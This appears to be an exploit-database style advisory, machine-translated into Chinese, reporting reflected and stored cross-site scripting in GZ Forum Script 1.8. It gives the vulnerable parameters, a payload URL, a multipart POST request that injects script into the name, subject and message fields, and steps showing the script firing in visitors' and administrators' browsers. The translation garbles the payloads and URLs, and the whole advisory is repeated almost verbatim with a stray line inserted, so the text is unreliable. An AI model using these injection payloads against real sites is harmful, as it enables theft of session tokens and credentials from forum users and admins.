#利用标题: GZ论坛脚本1.8-存储的跨站点脚本(XSS)
#日期: 30/06/2023
#利用作者:饼干
#vendor: gz脚本
#供应商HomePage: https://gzscripts.com/
#软件link: https://gzscripts.com/gz-forum-script.html
#版本: 1.8
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
##发行Notes:
反映XSS:
攻击者可以将电子邮件中包含恶意URL的链接发送给受害者,或者
即时信息可以执行各种各样的动作,例如偷走受害者的
会话令牌或登录凭据
存储的XSS
允许攻击者将恶意代码注入网站,赋予窃取敏感的能力
信息,操纵数据并启动其他攻击。
##反映XSS
path: /preview.php
获取“ catid”参数很容易受到RXSS的影响
path: /preview.php
获取“主题”参数很容易受到RXSS的影响
http://www.website/PREVIEW.PHP?CONTROLLER=loadAction=topictopicid=1wgaff">><Script:ALERT:EALERT (1)%3C%2FSRICT%3EXDHK2
##存储的XSS
----------------------------------------------------------------
post/gzforumscript/preview.php?controller=loadaction=start_new_topic http/1.1
---------------------------------------- 39829578812616571248381709325
content-disposition: form-data;名称='free_name'
ScriptTalet(1)/脚本
---------------------------------------- 39829578812616571248381709325
content-disposition: form-data;名称='主题'
ScriptTalet(1)/脚本
---------------------------------------- 39829578812616571248381709325
content-disposition: form-data;名称='topor_message'
ScriptTalet(1)/脚本
----------------------------------------- 39829578812616571248381709325-
----------------------------------------------------------------
帖子参数“ free_name”很容易受到XSS的影响
发布参数“主题”很容易受到XSS的影响
帖子参数“ topor_message”很容易受到XSS的影响
##复制步骤:
1。作为[访客用户]单击[新主题]在此路径上创建一个“新主题”(http://website/preview.php?controller=loadAction=start_new_topic)
2。将您的[XSS有效载荷]注入“名称”
3。在“主题标题”中注入您的[XSS有效载荷]
4。在“主题消息”中注入您的[XSS有效载荷]
5。提交
4。XSS在访问者浏览器访问主题时被触发的[XSS有效载荷]
5。XSS在该路径上的管理面板中访问管理面板时在管理员浏览器上发射(https://website/gzadmin/dashboard)
6. XSS在访问[主题] [所有主题]的管理员浏览器上触发了此路径上的[新主题](3https://website/gztopic/index)
#日期: 30/06/2023
#利用作者:饼干
#vendor: gz脚本
#供应商HomePage: https://gzscripts.com/
#软件link: https://gzscripts.com/gz-forum-script.html
#版本: 1.8
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
##发行Notes:
反映XSS:
攻击者可以将电子邮件中包含恶意URL的链接发送给受害者,或者
即时信息可以执行各种各样的动作,例如偷走受害者的
会话令牌或登录凭据
存储的XSS
允许攻击者将恶意代码注入网站,赋予窃取敏感的能力
信息,操纵数据并启动其他攻击。
##反映XSS
path: /preview.php
获取“ catid”参数很容易受到RXSS的影响
正在加载...
www.website
获取“主题”参数很容易受到RXSS的影响
http://www.website/PREVIEW.PHP?CONTROLLER=loadAction=topictopicid=1wgaff">><Script:ALERT:EALERT (1)%3C%2FSRICT%3EXDHK2
##存储的XSS
----------------------------------------------------------------
post/gzforumscript/preview.php?controller=loadaction=start_new_topic http/1.1
---------------------------------------- 39829578812616571248381709325
content-disposition: form-data;名称='free_name'
ScriptTalet(1)/脚本
---------------------------------------- 39829578812616571248381709325
content-disposition: form-data;名称='主题'
ScriptTalet(1)/脚本
---------------------------------------- 39829578812616571248381709325
content-disposition: form-data;名称='topor_message'
ScriptTalet(1)/脚本
----------------------------------------- 39829578812616571248381709325-
----------------------------------------------------------------
帖子参数“ free_name”很容易受到XSS的影响
发布参数“主题”很容易受到XSS的影响
帖子参数“ topor_message”很容易受到XSS的影响
##复制步骤:
1。作为[访客用户]单击[新主题]在此路径上创建一个“新主题”(http://website/preview.php?controller=loadAction=start_new_topic)
2。将您的[XSS有效载荷]注入“名称”
3。在“主题标题”中注入您的[XSS有效载荷]
4。在“主题消息”中注入您的[XSS有效载荷]
5。提交
4。XSS在访问者浏览器访问主题时被触发的[XSS有效载荷]
5。XSS在该路径上的管理面板中访问管理面板时在管理员浏览器上发射(https://website/gzadmin/dashboard)
6. XSS在访问[主题] [所有主题]的管理员浏览器上触发了此路径上的[新主题](3https://website/gztopic/index)